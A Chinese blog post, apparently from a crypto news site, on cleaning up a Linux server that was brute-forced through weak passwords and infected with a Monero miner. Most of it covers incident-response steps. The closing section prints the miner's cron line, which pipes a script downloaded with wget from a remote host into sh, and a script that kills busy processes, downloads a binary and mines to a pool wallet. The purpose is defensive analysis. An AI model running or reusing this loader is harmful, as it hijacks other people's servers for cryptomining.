服务器被通过用户弱口令暴力破解并安装比特币挖矿恶意软件后的处理措施

  • A+
所属分类:比特币(BTC)

chatGPT账号

服务器被通过用户弱口令暴力破解并安装比特币挖矿恶意软件后的处理措施

一、说明

提供公网服务对外暴露ip的服务器在安装常用软件时,可能会设置软件对应权限用户的弱密码。比如,在安装mysql数据库时创建mysql用户,同时设置mysql的用户密码为mysql;在安装postgres时设置用户名和密码均为postgres;安装nginx时设置用户名和密码均为nginx;安装docker时用户名和密码均为docker等。在应用程序部署时通常容易忽略应用程序用户对应的弱密码。这样就会给攻击者留下弱口令攻击漏洞。

如果攻击者获取了服务器对外访问的ssh端口,同时通过应用程序弱口令暴力破解了用户密码,就可以通过ssh登录到操作系统上,使用弱口令用户部署相关的比特币miner挖矿软件,从而消耗服务器资源,导致系统负载异常。原来正常部署的应用程序出现莫名其妙的资源征用问题,包括cpu,内存,虚拟内存,磁盘空间,读写io的资源征用问题。比较明显的出现在数据库服务器oracle,mysql,postgres等db服务中。

二、解决方案

出现该问题,可以通过如下解决方案处理服务器被移植比特币,莱特币,门罗币,以太坊等恶意挖矿软件问题。

1.在不影响业务的前提下,及时隔离主机/容器,避免部分带有蠕虫功能的挖矿木马进一步在内网进行横向移动;

2.使用`top -c`命令查看系统性能,找出消耗CPU较高的进程PID(部分挖矿木马可能会篡改top命令实现进程隐藏,可以使用`which top | xargs stat`命令判断top文件是否被黑客篡改);

3.根据获取的进程PID,使用“ps -ef -p PID”命令找出进程的详细信息;

4.根据进程详细信息定位到文件位置,并对该文件进行分析,确认是否属于挖矿木马;

5.若确认为挖矿木马,则进行如下清理操作:

(1)结束挖矿相关进程:kill 9 PID

(2)删除挖矿相关文件:rm -rf 异常文件,删除文件时可以使用find / -name 异常文件查找出系统中的所有恶意文件

(3)查看并清理异常定时任务:

 

crontab -e

crontab -u username -l

cat /etc/crontab

cat /var/spool/cron

cat /etc/anacrontab

cat /etc/cron.d/

cat /etc/cron.daily/

cat /etc/cron.hourly/

cat /etc/cron.weekly/

cat /etc/cron.monthly/

cat /var/spool/cron/

(4)查看密钥认证文件

删除木马创建的密钥认证文件,如果当前系统之前并未配置过密钥认证,可以直接清空认证存放目录:rm -rf /root/.ssh/*。如果有配置过密钥认证,只需要删除黑客创建的认证文件即可

注:在处理比特币恶意挖矿miner软件进程时,如果直接kill 进程后会发现进程又自动重启了,出现该问题实际上是攻击者在os上设置了定时任务,一旦检查到miner进程被kill立即重启,这样由于病毒文件始终被进程锁定占用,因此无法彻底删除挖矿minter病毒软件。需要先清空定时任务,然后再删除比特币minter挖矿恶意软件才能彻底的清空minter软件。

6.对系统进行风险排查和安全加固,详情可参考如下链接:
【Linux】https://cloud.tencent.com/document/product/296/9604
【Windows】https://cloud.tencent.com/document/product/296/9605

三、附常见的linux core 比特币挖矿病毒部分源码。

可以根据源码中的功能部分查杀被感染的操作系统文件,进而彻底的清楚比特币挖矿木马病毒

根据源码,定向解决问题

#每天定时下载
@daily wget -O - -q http://xxx.xxx.xxx.xxx:2932/xxl/coreProcess.sh | sh > /dev/null 2>&1

脚本源码:

#!/bin/sh
/bin/ps axf -o "pid %cpu" | awk '{if($2>=90.0) print $1}' | while read procid
do
kill -9 $procid
done
zero=0
process=`ps aux | grep 'HbewX' | grep -v grep| wc -l`
if [ "$process" -eq "$zero" ]; then
	if [ -f /tmp/core ]
 	then
 	/core --coin monero -o xmr.f2pool.com:1353 -u 46YngqQEnoesGdoecXZRM2urEWNdeWNtj.xxl -p x -k --donate-level=1 -B --cpu-max-threads-hint=70
 	echo started existing
 	else
 		wget -q http://xxx.xxx.xx.xx:2932/xxl/core -O /tmp/core
 		chmod +x /core
 		/core --coin monero -o xmr.f2pool.com:1353 -u 46Yngq6t7RKTbhW4TtqdKUQyggs3x7pADEWvprWNtj.xxl -p x -k --donate-level=1 -B --cpu-max-threads-hint=71
 	fi
else
echo "process runing"
fi

至此,完成服务器被通过用户弱口令暴力破解并安装比特币挖矿恶意软件后的处理措施所有操作流程。

添加VX或者telegram获取全程线上免费指导

服务器被通过用户弱口令暴力破解并安装比特币挖矿恶意软件后的处理措施

免责声明

发文时比特币价格:$66249

当前比特币价格:[crypto coins=”BTC” type=”text” show=”price”]

当前比特币涨幅:[crypto coins=”BTC” type=”text” show=”percent”]

免责声明:

本文不代表路远网立场,且不构成投资建议,请谨慎对待。用户由此造成的损失由用户自行承担,与路远网没有任何关系;

路远网不对网站所发布内容的准确性,真实性等任何方面做任何形式的承诺和保障;

网站内所有涉及到的区块链(衍生)项目,路远网对项目的真实性,准确性等任何方面均不做任何形式的承诺和保障;

网站内所有涉及到的区块链(衍生)项目,路远网不对其构成任何投资建议,用户由此造成的损失由用户自行承担,与路远网没有任何关系;

路远区块链研究院声明:路远区块链研究院内容由路远网发布,部分来源于互联网和行业分析师投稿收录,内容为路远区块链研究院加盟专职分析师独立观点,不代表路远网立场。

本文是全系列中第158 / 226篇:行业技术

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的电报
  • 这是我的电报扫一扫
  • weinxin
chatGPT账号
路远

发表评论

您必须登录才能发表评论!